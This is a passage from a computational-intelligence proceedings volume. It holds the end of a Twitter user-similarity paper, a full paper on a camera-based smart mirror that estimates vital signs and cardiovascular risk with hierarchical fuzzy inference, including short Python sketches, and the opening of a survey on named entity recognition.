Percentage similarity                 8.02%              7.73%              44.44%

Five hundred and twenty-four volunteers were asked to create a list of the test
users, @Bertkreischer, @Seanseaevans, and @Kamalaharris in decreasing similarity
to @Tomsegura and @Joebiden. The results of the survey are compared with a list
made using the percentage similarity calculated using the proposed methodology.
According to the survey results, 92.75% and 87.64% of the volunteers produced rankings identical to ours in the two cases. Generalizing from these results, it can be said that this method works for the majority of users on Twitter, and it produces a fairly accurate result in our case study consisting of a selection of varied accounts.

5 Conclusion and Future Work

This paper proposes a methodology to find the percentage similarity between two users. This similarity percentage is calculated using eight parameters: retweets, liked tweets, followers and following, common hashtags, mention similarity, common interest, common topic and list, and profile similarity of the two Twitter users. Further work can be done on the assignment of weights and on adding more parameters to further improve this technique.
For comparing its performance, a dataset of five users was used, with users from the fields of entertainment and politics. On comparing the results with those obtained by the survey, this method was found to be more efficient and effective than previous works.
Therefore, this is a highly favorable technique for various real-world applications
such as curating advertisements for users based on interests, recommending content
similar to what is normally consumed by the user, and similar account suggestions.

References

1. Goel, A., Sharma, A., Wang, D., & Yin, Z. (2013). Discovering similar users on Twitter.
Chicago, USA: In Workshop on Mining and Learning with Graphs.
2. Razis, G., & Anagnostopoulos, I. (2016). Discovering similar Twitter accounts using semantics.
Engineering Applications of Artificial Intelligence.
3. Vathi, E., Siolas, G., & Stafylopatis, A. (2015). Mining interesting topics in Twitter communi-
ties. In Computational Collective Intelligence. Berlin: Springer.
4. Kamath, K., Sharma, A., Wang, D., & Yin, Z.: RealGraph: User interaction prediction at Twitter.
In Presented at the User Engagement Optimization workshop@ KDD.
5. Dean, J., & Ghemawat, S. (2008). MapReduce: Simplified data processing on large clusters.
Commun ACM.
6. Smith, C. (2016). 170+ Amazing Twitter statistics. DMR.
7. Word Lists by Theme. Wordbanks–EnchantedLearning.com.
8. Gupta, P., Goel, A., Lin, J., Sharma, A., Wang, D., & Zadeh, R., WTF: The who to follow
service at Twitter. In Proceedings of the 22nd International Conference on World Wide Web,
New York, NY, USA.

9. Socher, R., et al. (2013). Recursive deep models for semantic compositionality over a senti-
ment treebank. In Proceedings of the Conference on Empirical Methods in Natural Language
Processing (EMNLP) (pp. 1631–1642).
10. Macskassy, S. A. (2010). Discovering users' topics of interest on Twitter: A first look. In Proceedings of the Fourth Workshop on Analytics for Noisy Unstructured Text Data.
11. Singh, K. (2016). Clustering of people in social network based on textual similarity. Elsevier
GmbH.
12. Xu, Z. (2011). Discovering user interest on twitter with a modified author-topic model.
13. AlMahmoud, H., & AlKhalifa, S. (2018). TSim: A system for discovering similar users on Twitter.
14. Kalra, S., Johari, R., Dahiya, S., & Yadav, P. (2018). WAPiS: WhatsApp pattern identifica-
tion algorithm indicating social connection. Advanced Computational and Communication
Paradigms.
15. Mohta, A., Jain, A., Saluja, A., & Dahiya, S. (2020). Pre-processing and emoji classification of WhatsApp chats for sentiment analysis. In Fourth International Conference on I-SMAC (IoT in Social, Mobile, Analytics and Cloud) (I-SMAC).
16. Dahiya, S., Mohta, A., & Jain, A. (2020). Text classification based behavioural analysis of WhatsApp chats. In 5th International Conference on Communication and Electronics Systems (ICCES).
17. Kanungsukkasem, N., & Leelanupab, T. (2016). Power of crowdsourcing in Twitter to find
similar/related users. In 13th International Joint Conference on Computer Science and Software
Engineering (JCSSE).
18. Jiang, J., Lu, H., Li, P., Pan, G., & Xie, X. (2017). Finding influential local users with similar
interest from geo-tagged social media data. In 18th IEEE International Conference on Mobile
Data Management (MDM).
19. Wu, C., Wu, J., Luo, C., Wu, Q., Liu, C., Wu, Y., et al. (2019). Recommendation algorithm based
on user score probability and project type. EURASIP Journal on Wireless Communications and
Networking.
20. Ahmad, W., & Ali, R. (2018). Understanding the users personal attributes selection tendency
across social networks. In 3rd International Conference On Internet of Things: Smart Innova-
tion and Usages (IoT-SIU).
On the Design of a Smart Mirror for
Cardiovascular Risk Prediction

Gianluca Zaza

Abstract According to the World Health Organization, cardiovascular diseases are one of the leading causes of death. Prevention, together with a healthy lifestyle, could reduce these high numbers. Moreover, telehealth systems that allow remote and continuous monitoring of patients can be used for alerting the medical experts if anomalies are detected. In this work, a smart mirror for vital parameter measurements and cardiovascular risk assessment is proposed. It is a contactless solution, based on remote photoplethysmography (rPPG), that allows natural and easy measurements.
Moreover, a Hierarchical Fuzzy Inference System (HFIS) has been used to predict
the cardiovascular risk level. Finally, the acceptability of the new technology has
been measured, since in the medical domain users need to trust the results obtained
by the automatic techniques. Results have shown that the measurements performed
with the smart mirror are reliable, since they are comparable with the pulse oximeter,
used as baseline. Moreover, the use of HFIS has significantly reduced the number
of rules, while preserving a good accuracy. Finally, Technology Acceptance Model
(TAM) has shown high usability and acceptability values, thus suggesting that the
smart solution can be adopted in daily routine.

Keywords Smart mirror · Internet of things · Telemedicine · Photoplethysmography · Hierarchical Fuzzy Inference System · Technology Acceptance Model

1 Introduction

Cardiovascular diseases (CVDs) are one of the main causes of death in the world.
Indeed, the World Health Organization (WHO)1 estimated that in 2016 almost 18 million deaths were caused by cardiovascular problems. Specifically, the term

1 https://www.who.int/news-room/fact-sheets/detail/cardiovascular-diseases-(cvds).

G. Zaza (B)
Department of Computer Science, University of Bari, Bari, Italy
e-mail: gianluca.zaza@uniba.it


CVD includes different disorders that affect the cardiovascular system such as coro-
nary artery disease, cerebrovascular disease, heart attacks, strokes, etc. There are three main factors that could cause CVDs: unhealthy diets, excessive use of tobacco, and physical inactivity. Thus, one way to limit CVDs is to promote a healthy life, but prevention is equally important. On the one hand, promoting a healthy life means carrying out global policies that include, for example, taxing the consumption of high-sugar foods, building walking and cycle paths, providing healthy school meals in children's classrooms, etc. On the other hand, education is necessary to prevent CVD. Particularly, citizens should be aware of the conditions suggesting the onset of an emergency.
Moreover, monitoring of heart rate, breathing rate, and blood oxygen saturation,
that are the three vital parameters mainly involved in the cardiovascular process, is
necessary to detect in time the worsening of the disease [1].
Usually two medical devices, such as electrocardiogram (ECG) and pulse oxime-
ter, are used to measure these parameters. ECG is a medical device that graphically
records the electrical activity of the heart and its rhythm. The measurements through
ECG require the presence of medical experts to manage the device. On the contrary,
pulse oximeter is a small device that is commonly used for acquiring the measure-
ments from the fingers. It is based on the photoplethysmography (PPG) technology
[2]. A light source is used to illuminate the tissue (e.g., skin) and a photodetector
to measure the small changes in light intensity associated with changes in blood
volume. Both the devices need to be in contact with the skin for a correct measure-
ment. In recent years, thanks to the advancement of technology in the field of digital
cameras and image processing, the measurement of vital parameters through a new
methodology, called remote photoplethysmography (rPPG), has been possible [3]. It
is based on the same technology of PPG but it uses a camera as a photodetector and
the ambient light as a light source, thus avoiding contact. This characteristic allows
new monitoring scenarios where there is no need of contact between the subject and
the measurement devices, and it also does not require the presence of medical experts,
thus it is suitable for telemedicine applications, where parameters are remotely and
continuously acquired and then stored in databases accessed by medical staff only
[4–7].
This paper provides a concise description of the ongoing PhD research activity of the author.
A non-contact vital signs monitoring system based on a see-through mirror has been proposed. It is equipped with a camera that captures video frames of patients' faces. The rPPG signals extracted from the video frames are processed for measuring
heart rate (HR), breathing rate (BR), blood oxygen saturation (SpO2) and the color of
lips. These data are used by a Hierarchical Fuzzy Inference System (HFIS), embedded
in the smart object, for cardiovascular risk level estimation. The goal is to create a
telemedicine solution for domestic use that is both cheap and easy to use.
The rest of the paper is organized as follows: a literature review on rPPG systems
and fuzzy inference systems for CVD is detailed in Sect. 2. From the analysis of the
state-of-the-art research five gaps are pointed out (Sect. 3), and the research goals are
outlined (Sect. 4). Three main hypotheses are then defined (Sect. 5). The proposed

methodology and the results are reported in sections (Sect. 6) and 7. Finally Sect. 8
concludes this work by outlining future directions.

2 Literature Review

Two main components are critical for the smart mirror that has been proposed:
the measurements module (through rPPG) and the inference system (through FIS).
The state-of-the-art methodologies for these two modules will be described in the
following, by highlighting their limits.
A pioneering work on rPPG was proposed by Verkruysse et al. [3], where it is
described how vital signals can be extracted through video images captured by a
camera. Moreover, Poh described how to use image processing techniques and blind
source separation to obtain the signal from the captured video frames [8]. Takano et
al. [9] have used a charge coupled device (CCD) camera for measuring heart rate and
respiratory rate from a person’s face. In [10], a Microsoft device KinectTM version
2.0 is used to capture vital parameters in real time. While in [11] the camera is used in
a specific real-world context, that is, for car drivers' parameter detection. However, while these works provide non-invasive monitoring, they are difficult to apply in a real-world setting such as a smart home.
The first attempt in developing an easy-to-use solution, through the use of a mobile
phone is described in [12]. However, its use could be uncomfortable for elderly
people, since they need continuous monitoring of their vital parameters, and they are
not used to modern technologies. An interesting solution that overcomes these limits
is proposed in [13], where a mirror for monitoring of semeiotic facial signals related
to cardio-metabolic risk is described, and it is shown how this daily object encourages
the users in improving their lifestyle. However, it consists of several sensors, that
make it very difficult to install in a real domestic scenario. On the contrary, the
proposed device is meant for overcoming all the previously described issues. Indeed,
a smart mirror has been developed, that thanks to a camera embedded in its structure,
is able to acquire video frames of the subjects and thus to derive the vital parameters
measurements. While as in [13], the choice of a common object enhances the users
willingness to use it, low-cost components have been used, and a ready to use smart
object is proposed, thus avoiding hardware and software configurations.
Afterward, the data collected are sent to a Fuzzy Inference System (FIS) that
returns cardiovascular risk level. FISs have shown to be very useful and reliable in
the medical field because of their ability to manage uncertainty and vagueness that
are proper of this domain [14]. Thanks to their generality, they have been used as
decision support systems for different diseases, such as diabetes [15], eye diseases
[16], hypertension [17], and neurodegenerative diseases [18–20], just to mention
few.
With the aid of medical experts, a FIS for cardiovascular risk level estimation has
been proposed in [21]. While the accuracy of the defined FIS was high, the number of
rules grew exponentially with the number of the input variables, hence the resulting

rule base was quite complex. Reducing the number of rules is mandatory in order to
improve interpretability [22]. So, in order to solve the “curse of dimensionality” that
occurs in flat FISs, HFISs have been effectively used in several fields [23]. However,
very few works use HFISs in the medical field. In [24], it is used to evaluate and
measure the effects of rehabilitation in post-stroke patients while in [25] it is used to
diagnose Dengue fever. Thus, the previously proposed FIS has been improved by designing and implementing an HFIS for cardiovascular risk assessment.

3 Research Gaps

With regard to the two components described in Sect. 2, five main gaps have been
identified in state-of-the-art approaches:
G 1 : They are not suitable for daily use in a smart home scenario where the user easily adopts the device in their normal routine;
G 2 : The mirrors for parameters estimation do not measure blood oxygen saturation;
G 3 : Several telehealth systems for cardiovascular measurements have been pro-
posed, however they focus on the technical issues related to data privacy and
communication while ignoring the measurements of the parameters that are per-
formed with common devices;
G 4 : Fuzzy logic is suitable to describe medical concepts and reasoning about them.
However, the number of rules in flat FISs grows with the number of input vari-
ables, thus techniques for reducing their complexity are needed. To this aim,
HFISs have proven to be effective, however few works use them in the medical
domain, and none of them focus on cardiovascular disease;
G 5 : Usability and acceptability are two crucial issues when dealing with users that
are no technicians, and they enhance the user trustability of the automatic devices.
There are no works that explore this aspect in smart objects for cardiovascular
decision support systems.

4 Objectives

Starting from the research gaps that have been identified in the previous phase, five
research objectives have been defined.
O1 : Develop a contactless and easy-to-use smart device for cardiovascular risk
assessment, that can be used during the daily routine at home;
O2 : Develop a smart mirror that is able to measure four vital parameters, namely
heart rate, breath rate, blood oxygen saturation, and color of lips;
O3 : Embed the smart mirror in a telemedicine environment;
O4 : Define a Hierarchical Fuzzy Inference System for cardiovascular risk assess-
ment;

O5 : Evaluate the acceptability of the new proposed technology, to final users.

5 Hypothesis

On the basis of the research gaps and the research objectives, three main hypotheses
have then been defined and they will be verified in the following paragraph.
H1 : A smart mirror is able to accurately measure the four vital parameters, useful
to derive cardiovascular risks. The use of rPPG, together with signal and video
processing techniques, allows contactless measurements of the parameters;
H2 : Hierarchical fuzzy inference systems are suitable predictors for cardiovascular
risk levels. Moreover, the use of HFISs, instead of flat FISs, allows the reduction
of number of rules;
H3 : The use of a common object, as the mirror is, improves the acceptability of
the new technology to users, thus enhancing its use and its effectiveness for
prevention.

6 Methodology

With regard to hypothesis H1, a smart mirror, shown in Fig. 1, has been developed
to acquire facial video frames used to extract the rPPG signal and then the four
vital parameters defined before. Cheap components have been used for the hardware
architecture: a monitor to show messages, acrylic film that is partially reflective and
transparent, a wood frame, and a camera [26, 27]. The current prototype is based on
a client/server architecture that is used for processing.
A software pipeline has then been defined to process the acquired video frames
and extract vital parameters values from signals.
The processing starts with real-time face identification from short video frames
acquired through the camera. A preliminary 26 s cycle is required to correct camera
distortion and then just 2 s are necessary for each measurement. Python libraries for
video and signal processing have been used. Particularly, OpenCv2 to capture and
process video frames; Dlib with a pretrained frontal detector3 to identify the area of
the frame containing the face and facial landmark detection4 to obtain a set of 68
facial landmarks [28]. Then, three regions of interest (ROIs) are selected based on their significance in blood passage modulation, and a fourth ROI is used to reduce signal distortion due to facial movements.
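A minimal sketch of the face-detection and ROI-averaging step, assuming OpenCV, dlib, and the publicly available 68-landmark shape predictor file; the specific forehead ROI and the landmark indices chosen below are illustrative assumptions, not necessarily those used in the actual system.

```python
import cv2
import dlib
import numpy as np

detector = dlib.get_frontal_face_detector()
# Publicly available pretrained 68-landmark model (the file path is an assumption).
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")

def roi_means(frame):
    """Return the mean R, G, B values of an illustrative forehead ROI, or None."""
    gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
    faces = detector(gray, 0)
    if not faces:
        return None
    shape = predictor(gray, faces[0])
    pts = [(shape.part(i).x, shape.part(i).y) for i in range(68)]
    # Illustrative ROI: the box spanned by the inner eyebrow landmarks (21, 22),
    # shifted upward by its own width.
    x1, x2 = pts[21][0], pts[22][0]
    y = min(pts[21][1], pts[22][1])
    w = max(x2 - x1, 1)
    roi = frame[max(y - w, 0):y, x1:x2]
    if roi.size == 0:
        return None
    b, g, r = cv2.split(roi.astype(np.float32))
    return float(r.mean()), float(g.mean()), float(b.mean())

cap = cv2.VideoCapture(0)      # the camera embedded in the mirror
ok, frame = cap.read()
if ok:
    print(roi_means(frame))
cap.release()
```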
The RGB signals coming from the ROIs are used to estimate the vital parameters.
Particularly, a signal matrix is obtained by averaging the pixels of each RGB channel and of each ROI.

2 https://pypi.org/project/opencv-python/.
3 http://dlib.net/.
4 http://dlib.net/imaging.html#shape_predictor.

Table 1 Mean absolute error and standard deviation obtained by comparing our contactless system and the pulse oximeter

        All subjects    Healthy subjects    Unhealthy subjects
HR      3.45 ± 2.93     2.87 ± 2.39         4.90 ± 3.74
SpO2    1.83 ± 2.43     1.54 ± 1.76         2.56 ± 3.63

Afterward, noise reduction techniques such as the Finite Impulse
Response [29], the Chrominance method [30] and linear interpolation are used to
obtain more robust signals. Finally, the most informative ROI is used to evaluate
the vital signals as suggested in [3, 8, 31]. Lip color was obtained by extracting and
analyzing a specific ROI that includes the mouth. The K-means algorithm was applied to quantify the predominant color in the ROI from the resulting three main colors in RGB format.
With respect to H2, an HFIS was developed starting from a flat FIS rule base defined with the help of a clinician in [21]. The linguistic variables and the related fuzzy sets have been modeled by using the FISDET tool [32]. The HFIS consists of three FISs organized in a hierarchical fashion. Each FIS has two input variables and one output variable. Intermediate input/output variables have been used between the three levels. The final output, provided by the last layer, represents the cardiovascular risk level. Overall, the HFIS rule base includes 27 rules instead of the 81 defined in the flat FIS.
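A compact sketch of this hierarchical arrangement, written as a zero-order Sugeno-style system in plain Python; the membership functions, the rule tables, and the way the four variables are paired across the two levels are illustrative assumptions, not the configuration selected in [35].

```python
def tri(x, a, b, c):
    """Triangular membership function with feet a, c and peak b."""
    if x <= a or x >= c:
        return 0.0
    return (x - a) / (b - a) if x <= b else (c - x) / (c - b)

def mini_fis(x, y, mfs_x, mfs_y, rules):
    """Two-input, one-output FIS: min for AND, weighted average of rule outputs."""
    num = den = 0.0
    for (lx, ly), out in rules.items():
        w = min(tri(x, *mfs_x[lx]), tri(y, *mfs_y[ly]))
        num += w * out
        den += w
    return num / den if den else 0.0

# Illustrative membership functions (all ranges and breakpoints are assumptions).
HR_MF   = {"low": (30, 50, 70), "normal": (55, 75, 95), "high": (85, 130, 180)}
BR_MF   = {"low": (4, 8, 12), "normal": (10, 15, 20), "high": (18, 30, 45)}
SPO2_MF = {"low": (80, 88, 93), "normal": (92, 97, 100.5)}
LIP_MF  = {"pale": (-0.01, 0.0, 0.5), "normal": (0.3, 0.7, 1.01)}
MID_MF  = {"low": (-0.01, 0.0, 0.5), "medium": (0.25, 0.5, 0.75), "high": (0.5, 1.0, 1.01)}

# Illustrative rule tables: (label of input 1, label of input 2) -> crisp risk in [0, 1].
FIS1 = {("normal", "normal"): 0.1, ("low", "normal"): 0.4, ("high", "normal"): 0.6,
        ("high", "high"): 0.9}
FIS2 = {("normal", "normal"): 0.1, ("normal", "pale"): 0.5, ("low", "normal"): 0.7,
        ("low", "pale"): 0.9}
FIS3 = {("low", "low"): 0.1, ("low", "medium"): 0.3, ("medium", "low"): 0.3,
        ("medium", "medium"): 0.5, ("medium", "high"): 0.7, ("high", "medium"): 0.7,
        ("high", "high"): 0.9}

def cardiovascular_risk(hr, br, spo2, lip_redness):
    """Hierarchical chaining: two first-level FISs feed a second-level FIS."""
    r1 = mini_fis(hr, br, HR_MF, BR_MF, FIS1)
    r2 = mini_fis(spo2, lip_redness, SPO2_MF, LIP_MF, FIS2)
    return mini_fis(r1, r2, MID_MF, MID_MF, FIS3)

print(cardiovascular_risk(hr=110, br=22, spo2=91, lip_redness=0.2))  # -> 0.9 (high risk)
```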
With respect to H3, the Technology Acceptance Model (TAM) was used, and in vivo experiments have been conducted to evaluate the acceptability of the new technology to final users. A questionnaire was defined according to the TAM methodology, and users were asked to fill it in after having used the smart mirror [33].

Fig. 1 Example of vital parameters measurements through the smart mirror

7 Interpretation of Results

With regard to the hypothesis H1 , experiments have been conducted in order to verify
the effectiveness of the proposed smart mirror in measuring the four vital parameters. The values of HR and SpO2 obtained with our system have been compared with those measured by the pulse oximeter, which is used as baseline. Breath rate and lip color accuracy could not be evaluated, since there is no gold standard to compare them with. In vivo experiments were conducted; subjects were required to sit in front of the mirror at a distance of about 50 cm. Measurements with the smart mirror and the pulse oximeter have been conducted simultaneously, for a fair comparison. Results, reported in Table 1, have shown that the two measurements are in agreement since
a good correlation is obtained [26].
Moreover, since blood oxygen saturation is a good marker for COVID-19 pres-
ence, further experiments have been conducted by considering only this parameter.
Also, in this case, a high level of agreement has been obtained between the system
measurements and the baseline [34].
With regard to the hypothesis H2 , experiments have been conducted to compare
the performance of the defined HFIS and its flat FIS version [21], in terms of accu-
racy and number of rules. A dataset of 116 subjects was collected and labeled by
experts, assigning a risk level (Low, Medium, High, Very High). A total of 12 HFIS
configurations was firstly created by combining all the input variables. Then, the best
HFIS has been compared with the flat FIS, and overall accuracy values of 71.55%
and 69.97% were obtained, respectively [35]. Table 2 shows the classification per-
formance of both FIS and HFIS, for each risk level, in terms of accuracy (ACC),
True Positive and Negative Rate (TPR, TNR) and Positive and Negative Predictive
Values (PPV, NPV). As an overall evaluation, we observe that the HFIS performs better for the extreme risk classes than the original FIS. In light of the better total accuracy, and given the major importance of discriminating the extreme classes in the cardiovascular disease domain, the HFIS has been preferred to the FIS. Moreover, as previously said, the number of rules has been drastically reduced, thus enhancing the explainability of the inference system. With regard to H3, 30 subjects have been
involved in the study through TAM. Six main research questions were identified
regarding social and demographic factors, benefits, risks and privacy, usability and
acceptance, and for each of them a set of questions were defined according to the

Table 2 Classification results of HFIS and FIS

              HFIS                                   FIS
Risk          ACC   TNR   TPR   PPV   NPV            ACC   TNR   TPR   PPV   NPV
Low           0.76  0.80  0.14  0.04  0.93           0.83  1.00  0.77  1.00  0.60
Medium        0.76  0.80  0.14  0.04  0.93           0.75  0.76  0.57  0.13  0.96
High          0.91  0.97  0.12  0.25  0.94           0.91  0.94  0.50  0.40  0.96
Very high     0.91  0.97  0.53  0.73  0.93           0.88  0.96  0.40  0.60  0.91

Fig. 2 Averaged perception


of users about the main
considered factors

Results in Fig. 2 have shown a general positive feeling toward our
self-care monitoring solution, both among young and old people [33].

8 Conclusion

In this work, a smart mirror that is able to measure vital sign parameters from short
video frames of the user’s face has been developed. Moreover, a Hierarchical Fuzzy
Inference System has been designed with the aim of medical experts, in order to
automatically predict the cardiovascular risk level, from the analysis of the measured
parameters. Experiments have shown the effectiveness of the proposed approach in
both the measurement and predictive tasks. Moreover, since the stakeholders are not
necessary technicians, the acceptability of this new technology has been evaluated
through TAM and positive results have been collected.
Future works will be addressed to conduct massive experiments in hospitals and
medical facilities in order to learn rules and fuzzy sets through a neuro-fuzzy sys-
tem [36]. Moreover, a telemedicine system which embeds the smart mirror will be
developed, as defined in objective O3 .

References

1. Cook, S., Togni, M., Schaub, M. C., Wenaweser, P., Hess, O. M. (2006). High heart rate: A
cardiovascular risk factor? European Heart Journal, 27(20), 2387–2393
2. Allen, J. (2007). Photoplethysmography and its application in clinical physiological measure-
ment. Physiological Measurement, 28(3), R1.
3. Verkruysse, W., Svaasand, L. O., & Nelson, J. S. (2008). Remote plethysmographic imaging
using ambient light. Optics Express, 16(26), 21434–21445.
4. Alzubi, J., Manikandan, R., Alzubi, O., Gayathri, N., & Patan, R. (2019). A survey of specific
iot applications. International Journal on Emerging Technologies, 10(1), 47–53.

5. Alzubi, J., Selvakumar, J., Alzubi, O., & Manikandan, R. (2019). Decentralized internet of
things. Indian Journal of Public Health Research and Development, 10(2), 251–254.
6. Raj, R. J. S., Shobana, S. J., Pustokhina, I. V., Pustokhin, D. A., Gupta, D., & Shankar, K.
(2020). Optimal feature selection-based medical image classification using deep learning model
in internet of medical things. IEEE Access, 8, 58006–58017.
7. Abdulkareem, K. H., Mohammed, M. A., Salim, A., Arif, M., Geman, O., & Gupta, D., et al.
(2021). Realizing an effective covid-19 diagnosis system based on machine learning and iot in
smart hospital environment. IEEE Internet of Things Journal, 1–1.
8. Poh, M. Z., McDuff, D. J., & Picard, R. W. (2010). Non-contact, automated cardiac pulse mea-
surements using video imaging and blind source separation. Optics Express, 18(10), 10762–
10774.
9. Takano, C., & Ohta, Y. (2007). Heart rate measurement based on a time-lapse image. Medical
Engineering & Physics, 29(8), 853–857.
10. Bosi, I., Cogerino, C., & Bazzani, M. (2016). Real-time monitoring of heart rate by processing of
microsoft kinectTM 2.0 generated streams. In 2016 International Multidisciplinary Conference
on Computer and Energy Science (SpliTech), pp. 1–6
11. Zhang, Q., Wu, Q., Zhou, Y., Wu, X., Ou, Y., & Zhou, H. (2017). Webcam-based, non-contact,
real-time measurement for the physiological parameters of drivers. Measurement, 100, 311–
321.
12. Scully, C. G., Lee, J., Meyer, J., Gorbach, A. M., Granquist-Fraser, D., Mendelson, Y., et al.
(2012). Physiological parameter monitoring from optical recordings with a mobile phone. IEEE
Transactions on Biomedical Engineering, 59(2), 303–306.
13. Colantonio, S., Coppini, G., Germanese, D., Giorgi, D., Magrini, M., Marraccini, P., Martinelli,
M., Morales, M. A., Pascali, M. A., Raccichini, G., Righi, M., Salvetti, O. (2015). A smart
mirror to promote a healthy lifestyle. Biosystems Engineering, 138, pp. 33–43. Innovations in
Medicine and Healthcare.
14. Alonso, J. M., Castiello, C., Lucarelli, M., Mencar, C. (2013). Modeling interpretable fuzzy
rule-based classifiers for medical decision support. In Data mining: Concepts, methodologies,
tools, and applications, (pp. 1064–1081). IGI global
15. Lee, C., & Wang, M. (2011). A fuzzy expert system for diabetes decision support application.
IEEE Transactions on Systems, Man, and Cybernetics, Part B (Cybernetics), 41(1), 139–153
16. Ibrahim, F., Ali, J. B., Jaais, A. F., Taib, M. N. (2001). Expert system for early diagnosis of eye
diseases infecting the malaysian population. In Proceedings of IEEE Region 10 International
Conference on Electrical and Electronic Technology. TENCON 2001 (Cat. No.01CH37239).
Vol. 1. pp. 430–432.
17. Das, S., Ghosh, P., Kar, S. (2013). Hypertension diagnosis: A comparative study using fuzzy
expert system and neuro fuzzy system. In 2013 IEEE International Conference on Fuzzy
Systems (FUZZ-IEEE) (pp. 1–7)
18. Lella, E., & Vessio, G. (2020). Ensembling complex network ‘perspectives’ for mild cognitive
impairment detection with artificial neural networks. Pattern Recognition Letters, 136, 168–
174.
19. Vessio, G. (2019). Dynamic handwriting analysis for neurodegenerative disease assessment:
A literary review. Applied Sciences, 9(21), 4666.
20. Lella, E., Pazienza, A., Lofù, D., Anglani, R., & Vitulano, F. (2021). An ensemble learning
approach based on diffusion tensor imaging measures for alzheimer’s disease classification.
Electronics, 10(3), 249.
21. Casalino, G., Castellano, G., Castiello, C., Pasquadibisceglie, V., Zaza, G. (2019). A fuzzy
rule-based decision support system for cardiovascular risk assessment. In R. Fullér, S. Giove,
F. Masulli (Eds.), Fuzzy logic and applications, (pp. 97–108)
22. Mencar, C., Castellano, G., Fanelli, A. M. (2005). Some fundamental interpretability issues in
fuzzy modeling. In EUSFLAT Conference, pp. 100–105.
23. Kerr-Wilson, J., & Pedrycz, W. (2020). Generating a hierarchical fuzzy rule-based model.
Fuzzy Sets and Systems, 381, 124–139.

24. Prokopowicz, P., Mikolajewski, D., Mikolajewska, E., & Tyburek, K. (2017). Modeling
trends in the hierarchical fuzzy system for multi-criteria evaluation of medical data. In
EUSFLAT/IWIFSGN.
25. Alrashoud, M. (2019). Hierarchical fuzzy inference system for diagnosing dengue disease.
In 2019 IEEE International Conference on Multimedia & Expo Workshops (ICMEW), (pp.
31–36).
26. Casalino, G., Castellano, G., Pasquadibisceglie, V., & Zaza, G. (2019). Contact-less real-time
monitoring of cardiovascular risk using video imaging and fuzzy inference rules. Information,
10(1), 9.
27. Pasquadibisceglie, V., Zaza, G., & Castellano, G. (2018). A personal healthcare system for
contact-less estimation of cardiovascular parameters. In AEIT International Annual Confer-
ence. IEEE, 2018, 1–6.
28. Kazemi, V., & Sullivan, J. (2014). One millisecond face alignment with an ensemble of regres-
sion trees. In 2014 IEEE Conference on Computer Vision and Pattern Recognition, pp. 1867–
1874
29. Speake, T., & Mersereau, R. (1981). A note on the use of windows for two-dimensional fir
filter design. IEEE Transactions on Acoustics, Speech, and Signal Processing, 29(1), 125–127.
30. De Haan, G., & Jeanne, V. (2013). Robust pulse rate from chrominance-based rppg. IEEE
Transactions on Biomedical Engineering, 60(10), 2878–2886.
31. Kong, L. K. et al. (2013). Non-contact detection of oxygen saturation based on visible light
imaging device using ambient light. Optics express, 21 15, 17464–71
32. Castellano, G., Castiello, C., Pasquadibisceglie, V., & Zaza, G. (2017). Fisdet: Fuzzy inference
system development tool. International Journal of Computational Intelligence Systems, 10(1),
13–22.
33. Casalino, G., Castellano, G., Pasquadibisceglie, V., & Zaza, G. (2019). Evaluating end-user
perception towards a cardiac self-care monitoring process. In International Conference on
Wireless Mobile Communication and Healthcare (pp. 43–59). Springer.
34. Casalino, G., Castellano, G., & Zaza, G. (2020). A mhealth solution for contact-less self-
monitoring of blood oxygen saturation. In IEEE Symposium on Computers and Communica-
tions (ISCC). IEEE, 2020, 1–7.
35. Casalino, G., Grassi, R., Iannotta, M., Pasquadibisceglie, V., & Zaza, G. (2020). A hierarchical
fuzzy system for risk assessment of cardiovascular disease. In 2020 IEEE Conference on
Evolving and Adaptive Intelligent Systems (EAIS). IEEE (pp. 1–7)
36. Mencar, C., Castellano, G., & Fanelli, A. M. (2005). Deriving prediction intervals for neuro-
fuzzy networks. Mathematical and Computer Modelling, 42(7–8), 719–726.
Named Entity Recognition in Natural
Language Processing: A Systematic
Review

Abhishek Sharma, Amrita, Sudeshna Chakraborty, and Shivam Kumar

Abstract The enormous growth and availability of data poses a great challenge
for extracting useful information from documents written in natural language. The
information extraction task has become a vital activity in all domains. The process
of identifying the names of organization, people, locations or other entities in text
is called named entity recognition (NER). It is a subtask of information extraction and plays an important
part in discovering and classifying names such as organization names, person names, or locations. It is one
of the trending fields and a most important step in natural language processing (NLP) for the analysis of
text. Research on NER has changed a lot in the recent decade. NER can automatically scan entire articles
and reveal the people, organizations, and places mentioned in the text. Knowing the relevant labels for each
article helps in automatically organizing articles into well-defined hierarchies and supports smooth content
discovery. The intention of this paper is to present a survey on NER. The prime contribution of this research
is a systematic review of state-of-the-art NER according to the techniques used in NER. This paper also
provides tools, datasets, techniques, challenges and future directions in the field of NER with the aim of
providing researchers the substantial knowledge for further work.

Keywords Named entity recognition · Information extraction · Natural language


processing · Survey · Systematic review

1 Introduction

Named entity recognition (NER) is presumably the initial step towards information extraction; it tries to
locate and classify named entities in text into pre-defined categories, for example, the names of people,
locations, organizations, areas, quantities, monetary values, percentages, and so forth. NER is utilized in
numerous fields in Natural

A. Sharma · Amrita (B) · S. Chakraborty · S. Kumar


Computer Science & Engineering, School of Engineering & Technology, Sharda University,
Greater Noida, Uttar Pradesh, India

© The Author(s), under exclusive license to Springer Nature Singapore Pte Ltd. 2022 817
D. Gupta et al. (eds.), Proceedings of Second Doctoral Symposium on Computational
Intelligence, Advances in Intelligent Systems and Computing 1374,
https://doi.org/10.1007/978-981-16-3346-1_66

Language Processing (NLP). NER not only acts as a standalone tool but also plays
a very important role in various NLP applications like speech recognition, chatbots,
sentiment analysis, text classification, automatic summarization etc.
NER is also known as entity identification, entity extraction, and entity chunking. NER is an artificial
intelligence capability that aims to work at roughly the productivity of the human mind: the system is
organized so that it can discover entity elements in raw data and help decide the category to which each
element belongs. The data elements that are identified and classified in this way are known as named
entities (NE). The notion of NE appeared in the context of NLP applications and is far from being
linguistically clear and settled.

1.1 Evolution of NER

The expression NE, broadly used in information extraction (IE), question answering, and other natural
language processing applications, was coined in the Message Understanding Conferences (MUC), which
shaped IE research in the U.S. in the 1990s. At that time, MUC concentrated on IE tasks where structured
information about company activities and defense-related activities was extracted from unstructured text,
for example, newspaper articles. During system development, people realized that it is essential to recognize
such information, and extracting these entities was recognized as one of the significant subtasks of IE. As
this task is relatively independent, it has been evaluated separately in several different languages, for example
Japanese, Chinese and Spanish in the Multilingual Entity Tracking project. There have been several
evaluation-based projects for NE, such as one of the tasks of the Information Retrieval and Extraction
